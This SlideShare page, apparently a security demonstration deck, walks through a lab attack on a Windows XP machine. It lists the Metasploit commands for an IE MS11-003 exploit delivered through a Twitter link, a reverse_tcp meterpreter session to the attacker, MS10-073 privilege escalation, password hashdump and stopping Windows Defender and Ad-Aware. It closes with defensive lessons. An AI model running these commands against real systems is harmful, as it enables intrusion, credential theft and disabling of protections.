SlideShare a Scribd company logo

Metasploit Exploitation Scenarios -EN : Scenario 2

Download as KEY, PDF
Eric Romang
Eric Romang

Second scenario from the metasploit scenarios series

1 of 8
Metasploit Scenarios Scenario 2 Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 2 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User «test» has limited account profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - Antivirus : Ad-Aware Free / Windows Defender - Local Windows Firewall activated - Vulnerable to MS11-003 & MS10-073 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
Scenario 2 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
Scenario 2 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Target has three active local countermeasure softwares : As you will see they don’t react to anything ! ✤ Up-to-date Ad-Aware Free with default configuration. ✤ Windows Defender with default configuration. ✤ Windows Firewall with default configuration. ✤ Target is vulnerable to MS11-003 Internet Explorer vulnerability and to MS10-073 Keyboard Layout vulnerability ✤ MS11-003 will be our entry point ✤ MS10-073 our privileges escalation vector. (Stuxnet)
Scenario 2 : Story-Board ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-003 vulnerability. ✤ The target click on the provided link and MS11-003 is exploited. After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ Attacker will check the installed countermeasures, try to kill them without success, due to the limited privileges. ✤ Attacker has to check if these Microsoft patches are installed, in order to do the MS10-073 privilege escalation ✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957) ✤ If any of these patches are installed the MS10-073 privilege escalation is not possible. winenum is the solution. ✤ Attacker will then execute the post exploitation MS10-073 privileges escalation. ✤ Attacker will stop the following services : Windows Defender / Lavasoft Ad-Aware Service
Scenario 2 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit migrate X -> to another process kill X -> 2 times -> notepad.exe & main iexplorer.exe processes run getcountermeasure run getcountermeasure -k getuid shell echo %USERNAME% getprivs getsystem hashdump sysinfo ipconfig route background
Scenario 2 : Metasploit commands use post/windows/escalate/ms10_073_kbdlayout set SESSION 1 run sessions -i 1 getuid migrate X -> to a «NT AUTHORITYSYSTEM» process shell echo %USERNAME% net start net stop "Lavasoft Ad-Aware Service" net stop "Windows Defender" net start ps
Scenario 2 : Leasons Learned •Update your OS and applications ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Don’t trust your antivirus ! Select antivirus how detect basic attacks ! •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 8

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisTamas K Lengyel
 
MS08 067
MS08 067MS08 067
MS08 067Tim Krabec
 
Отчет Audit report RAPID7
Отчет Audit report RAPID7 Отчет Audit report RAPID7
Отчет Audit report RAPID7Sergey Yrievich
 
Report PAPID 7
Report PAPID 7Report PAPID 7
Report PAPID 7Sergey Yrievich
 
Optional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet DossierOptional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet DossierAlireza Ghahrood
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdfshehbaz15
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Worm Propagation Simulation Analysis
Worm Propagation Simulation AnalysisWorm Propagation Simulation Analysis
Worm Propagation Simulation Analysisallengalvan
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
RCS Demo HackingTeam
RCS Demo HackingTeam RCS Demo HackingTeam
RCS Demo HackingTeam OWASP Foundation
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementMauricio Velazco
 
STUXNET_
STUXNET_STUXNET_
STUXNET_bueno buono good
 
Hardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesHardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesSalvatore Lentini
 

More Related Content

Similar to Metasploit Exploitation Scenarios -EN : Scenario 2

metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisTamas K Lengyel
 
Отчет Audit report RAPID7
Отчет Audit report RAPID7 Отчет Audit report RAPID7
Отчет Audit report RAPID7Sergey Yrievich
 
Optional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet DossierOptional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet DossierAlireza Ghahrood
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdfshehbaz15
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Worm Propagation Simulation Analysis
Worm Propagation Simulation AnalysisWorm Propagation Simulation Analysis
Worm Propagation Simulation Analysisallengalvan
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementMauricio Velazco
 
Hardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesHardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesSalvatore Lentini
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 2 (20)

metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 
MS08 067
MS08 067MS08 067
MS08 067
 
Отчет Audit report RAPID7
Отчет Audit report RAPID7 Отчет Audit report RAPID7
Отчет Audit report RAPID7
 
Report PAPID 7
Report PAPID 7Report PAPID 7
Report PAPID 7
 
Optional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet DossierOptional Reading - Symantec Stuxnet Dossier
Optional Reading - Symantec Stuxnet Dossier
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdf
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Worm Propagation Simulation Analysis
Worm Propagation Simulation AnalysisWorm Propagation Simulation Analysis
Worm Propagation Simulation Analysis
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
RCS Demo HackingTeam
RCS Demo HackingTeam RCS Demo HackingTeam
RCS Demo HackingTeam
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Hardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesHardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS Technologies
 

Metasploit Exploitation Scenarios -EN : Scenario 2

  • 1. Metasploit Scenarios Scenario 2 Http:://eromang.zataz.com - Http://twitter.com/eromang
  • 2. Scenario 2 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User «test» has limited account profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - Antivirus : Ad-Aware Free / Windows Defender - Local Windows Firewall activated - Vulnerable to MS11-003 & MS10-073 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
  • 3. Scenario 2 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
  • 4. Scenario 2 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Target has three active local countermeasure softwares : As you will see they don’t react to anything ! ✤ Up-to-date Ad-Aware Free with default configuration. ✤ Windows Defender with default configuration. ✤ Windows Firewall with default configuration. ✤ Target is vulnerable to MS11-003 Internet Explorer vulnerability and to MS10-073 Keyboard Layout vulnerability ✤ MS11-003 will be our entry point ✤ MS10-073 our privileges escalation vector. (Stuxnet)
  • 5. Scenario 2 : Story-Board ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-003 vulnerability. ✤ The target click on the provided link and MS11-003 is exploited. After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ Attacker will check the installed countermeasures, try to kill them without success, due to the limited privileges. ✤ Attacker has to check if these Microsoft patches are installed, in order to do the MS10-073 privilege escalation ✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957) ✤ If any of these patches are installed the MS10-073 privilege escalation is not possible. winenum is the solution. ✤ Attacker will then execute the post exploitation MS10-073 privileges escalation. ✤ Attacker will stop the following services : Windows Defender / Lavasoft Ad-Aware Service
  • 6. Scenario 2 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit migrate X -> to another process kill X -> 2 times -> notepad.exe & main iexplorer.exe processes run getcountermeasure run getcountermeasure -k getuid shell echo %USERNAME% getprivs getsystem hashdump sysinfo ipconfig route background
  • 7. Scenario 2 : Metasploit commands use post/windows/escalate/ms10_073_kbdlayout set SESSION 1 run sessions -i 1 getuid migrate X -> to a «NT AUTHORITYSYSTEM» process shell echo %USERNAME% net start net stop "Lavasoft Ad-Aware Service" net stop "Windows Defender" net start ps
  • 8. Scenario 2 : Leasons Learned •Update your OS and applications ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Don’t trust your antivirus ! Select antivirus how detect basic attacks ! •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 8

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n
  8. \n
  9. \n
  10. \n
  11. \n